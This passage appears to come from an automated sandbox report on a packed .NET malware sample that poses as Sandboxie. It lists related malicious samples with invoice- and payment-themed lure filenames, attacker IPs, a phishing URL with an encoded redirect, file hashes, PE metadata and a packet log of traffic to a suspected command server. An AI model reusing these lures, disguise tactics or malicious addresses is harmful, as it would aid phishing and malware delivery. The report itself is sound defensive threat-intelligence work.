	Halkbank_Ekstre_20220327_073712_983787.pdf.exe	Get hash	malicious	Browse	188.114.96.7
	SWIFT gelen mesaj bildirim- dekont.exe	Get hash	malicious	Browse	188.114.96.7
	Ref-04122022115609.exe	Get hash	malicious	Browse	188.114.96.7
	Phosphoric AcidPR 120006486PO 120008190.pdf.exe	Get hash	malicious	Browse	188.114.97.7

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ROOTLAYERNETNL	order confirmation 46574 -QT-04-0022.exe	Get hash	malicious	Browse	45.137.22.163
	SecuriteInfo.com.Variant.Strictor.270970.1301.exe	Get hash	malicious	Browse	185.222.57.199
	OPOLTRANS 112022.docx	Get hash	malicious	Browse	45.137.22.41
	Quotation-pdf______________________________________.exe	Get hash	malicious	Browse	45.137.22.163
	2467864 _INV_pdf.exe	Get hash	malicious	Browse	45.137.22.163
	conferma d'ordine 46574.exe	Get hash	malicious	Browse	45.137.22.163
	factura proforma PI- PI04522 7486.exe	Get hash	malicious	Browse	45.137.22.163
	PI- PI04522 74868.exe	Get hash	malicious	Browse	45.137.22.163
	jDEnPXUI8C.exe	Get hash	malicious	Browse	185.222.57.203
	gtrrrewre.vbs	Get hash	malicious	Browse	185.222.57.209
	Datos bancarios.pdf.exe	Get hash	malicious	Browse	185.222.57.182
	paymentcopy-pdf__________________________________.exe	Get hash	malicious	Browse	45.137.22.163
	Paymentcopy-pdf___________________________________.exe	Get hash	malicious	Browse	45.137.22.163
	Quote_PDF_Quotation AKPI 04-04-22,pdf.exe	Get hash	malicious	Browse	45.137.22.122
	AIR CARGO BOARDING shipment MAWB 40608657504.exe	Get hash	malicious	Browse	45.137.22.163
	VAE LIMITED PO 2ORD200031-1910319 Swift copy..exe	Get hash	malicious	Browse	45.137.22.179
	Rpt47488747 & Invoice shipping doc.exe	Get hash	malicious	Browse	45.137.22.179
	PI- PI04522748-pdf.exe	Get hash	malicious	Browse	45.137.22.163
	Ordine di acquisto PO-JTT-00001018.exe	Get hash	malicious	Browse	45.137.22.163
	Payment Copy,pdf.exe	Get hash	malicious	Browse	45.137.22.122
CLOUDFLARENETUS	https://mysecuredsharecdocs.mystrikingly.com/	Get hash	malicious	Browse	104.18.6.145
	PMG QUOTE556565664339PDF.exe	Get hash	malicious	Browse	162.159.133.233
	http://www.selectscience.net/go/?itemID=79&itemTypeID=4&linkID=ctabutton&mailID=18205&email=edwina.capalad@exp.com&URL=http://bss25.lslideusa.com.#.aHR0cHM6Ly9leG90aWNzcGFycm90ei5jb20vbTBhdXRoL2V4cC5jb20vZWR3aW5hLmNhcGFsYWRAZXhwLmNvbQ==	Get hash	malicious	Browse	104.17.25.14
	order confirmation 46574 -QT-04-0022.exe	Get hash	malicious	Browse	188.114.97.7
	Revised Proforma Invoice.exe	Get hash	malicious	Browse	188.114.96.7
	ZHOU0422.exe	Get hash	malicious	Browse	188.114.97.7
	img-000.exe	Get hash	malicious	Browse	188.114.97.7
	Bahon Ltd Inquiry#20220412.exe	Get hash	malicious	Browse	188.114.96.7
	http://0kjrj.xyz	Get hash	malicious	Browse	188.114.97.7
	KW05200000032220.exe	Get hash	malicious	Browse	188.114.96.7
	Products Inquiries.exe	Get hash	malicious	Browse	188.114.97.7
	jRzSg8vuKb.exe	Get hash	malicious	Browse	188.114.96.7
	DhETQ6889l.exe	Get hash	malicious	Browse	188.114.96.7
	PO_28001.exe	Get hash	malicious	Browse	188.114.96.7
	deluxemat-et Order.xlsx	Get hash	malicious	Browse	162.159.134.233
	PO.xlsx	Get hash	malicious	Browse	104.21.82.227
	Halkbank001.exe	Get hash	malicious	Browse	188.114.96.7
	https://sk7hmvqac4.s3.us-south.objectstorage.softlayer.net/electrosynthetically/index.html?key=53fdcebf3db938ebf7c3227c19a54efc&redirect=https://www.amazon.com	Get hash	malicious	Browse	188.114.96.7
	Chamberlinarchitects.html	Get hash	malicious	Browse	104.18.11.207
	INVOICE.exe	Get hash	malicious	Browse	188.114.96.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	order confirmation 46574 -QT-04-0022.exe	Get hash	malicious	Browse	188.114.97.7
	Revised Proforma Invoice.exe	Get hash	malicious	Browse	188.114.97.7
	ZHOU0422.exe	Get hash	malicious	Browse	188.114.97.7
	img-000.exe	Get hash	malicious	Browse	188.114.97.7
	Bahon Ltd Inquiry#20220412.exe	Get hash	malicious	Browse	188.114.97.7
	KW05200000032220.exe	Get hash	malicious	Browse	188.114.97.7
	Products Inquiries.exe	Get hash	malicious	Browse	188.114.97.7
	jRzSg8vuKb.exe	Get hash	malicious	Browse	188.114.97.7
	DhETQ6889l.exe	Get hash	malicious	Browse	188.114.97.7
	PO_28001.exe	Get hash	malicious	Browse	188.114.97.7
	Halkbank001.exe	Get hash	malicious	Browse	188.114.97.7
	INVOICE.exe	Get hash	malicious	Browse	188.114.97.7
	TCPing_2.1.exe	Get hash	malicious	Browse	188.114.97.7
	https://drive.google.com/file/d/1sRnDQoYXTh1my3KfV3_QkD9ThW6_qx9M/view?usp=drive_web	Get hash	malicious	Browse	188.114.97.7
	gAw4QahhFW.dll	Get hash	malicious	Browse	188.114.97.7
	Swift Copy.exe	Get hash	malicious	Browse	188.114.97.7
	Payment slip.exe	Get hash	malicious	Browse	188.114.97.7
	rerwsr.exe	Get hash	malicious	Browse	188.114.97.7
	Nw PN #23069746XVNXH8W630HXFRATQH.vbs	Get hash	malicious	Browse	188.114.97.7
	Halkbank_Ekstre_20220327_073712_983787.pdf.exe	Get hash	malicious	Browse	188.114.97.7

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.356708753875314
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5:	3197B1D4714B56F2A6AC9E83761739AE
SHA1:	3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256:	40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512:	58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.6883827452051503
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
File size:	34304
MD5:	30bed8890c39e983e2a6b4f4e04edd0b
SHA1:	a293ee3cc2ce151f156127d466b802fdbbdd8f60
SHA256:	77cf402c8513d6df7dfd03896e08c6938fae41bf60d979e9bebf76d833f1b829
SHA512:	c0eba395048026e2e199b476261ca609f98c5ed880565cdb54993cb90767df783cce8bc4f93827d3731c0b3d8542b42733d63a695d8fc98fb51026240c342d8e
SSDEEP:	192:zTeVHnAzFWCDtaez1xOFmOnrzrYgWIQrX+eHBj74jDr6ffffffBw91qqR:+VHnAz5DQLM+XyIQrOeHa+ffffffBwB
TLSH:	9EF2B603FF9CA2ABF7642F7744215341BF65900AB022E70B5E503169FE623D37DA2669
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y................0......V.......M... ...`....@.. ....................................@................................

File Icon


Icon Hash:	0c17336941454103

Static PE Info

General

Entrypoint:	0x404d16
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x9CFD79CF [Wed Jun 18 11:04:47 2053 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4cc4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x5308	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4ca8	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2d1c	0x2e00	False	0.440726902174	data	5.53880228817	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x5308	0x5400	False	0.0972377232143	data	2.2680278507	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x6100	0x4c28	dBase IV DBT, blocks size 0, block length 16384, next free block index 40, next free block 16843008, next used block 257
RT_GROUP_ICON	0xad38	0x14	data
RT_VERSION	0xad5c	0x3ac	data
RT_MANIFEST	0xb118	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2020-2022 by David Xanatos (xanasoft.com)
Assembly Version	5.55.15.0
InternalName	fact.exe
FileVersion	5.55.15.0
CompanyName	Sandboxie-Plus.com
LegalTrademarks
Comments	Sandboxie Start
ProductName	Sandboxie
ProductVersion	5.55.15.0
FileDescription	Sandboxie Start
OriginalFilename	fact.exe

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2022 21:49:21.992264032 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.015013933 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.015155077 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.016129971 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.047652960 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.047702074 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.047730923 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.047756910 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.047782898 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.047796965 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.047815084 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.070350885 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070389032 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070419073 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070446014 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070472956 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070503950 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070506096 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.070529938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070555925 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070576906 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.070579052 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.070620060 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.093144894 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093178988 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093197107 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093214035 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093231916 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093247890 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093254089 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.093267918 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093291044 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093307972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093327045 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093343973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093362093 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093380928 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093400002 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093408108 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.093417883 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093436003 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093450069 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.093461037 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.093534946 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.115976095 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116034985 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116079092 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116089106 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116118908 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116161108 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116164923 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116204023 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116246939 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116257906 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116287947 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116328001 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116349936 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116367102 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116408110 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116415977 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116451025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116494894 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116499901 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116538048 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116575956 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116588116 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116616964 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116657019 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116663933 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116694927 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116727114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116748095 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116766930 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116806984 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116816044 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116847992 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116887093 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116894960 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.116928101 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116966963 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.116972923 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.117007971 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.117048979 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.117063999 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.117089987 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.117131948 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.117137909 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.139931917 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140000105 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140043020 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140060902 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140086889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140129089 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140140057 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140170097 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140211105 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140221119 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140249968 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140290976 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140294075 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140332937 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140373945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140378952 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140415907 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140455961 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140460968 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140496969 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140537977 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140542030 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140577078 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140618086 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140619040 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140660048 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140700102 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140705109 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140743971 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140782118 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140784979 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140820980 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140862942 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140865088 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140902042 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140943050 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.140944958 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.140983105 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141026974 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141041040 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141071081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141113043 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141118050 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141172886 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141215086 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141220093 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141252995 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141294956 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141300917 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141336918 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141376019 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141381025 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141416073 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141455889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141460896 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141496897 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141539097 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141539097 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141577959 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141617060 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141623020 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141659021 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141696930 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141705036 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141736984 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141777039 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141794920 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141819000 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141860962 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141866922 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141890049 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141932011 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141972065 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.141978979 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.141999960 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.164757013 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.164830923 CEST	80	49780	45.137.22.163	192.168.2.7
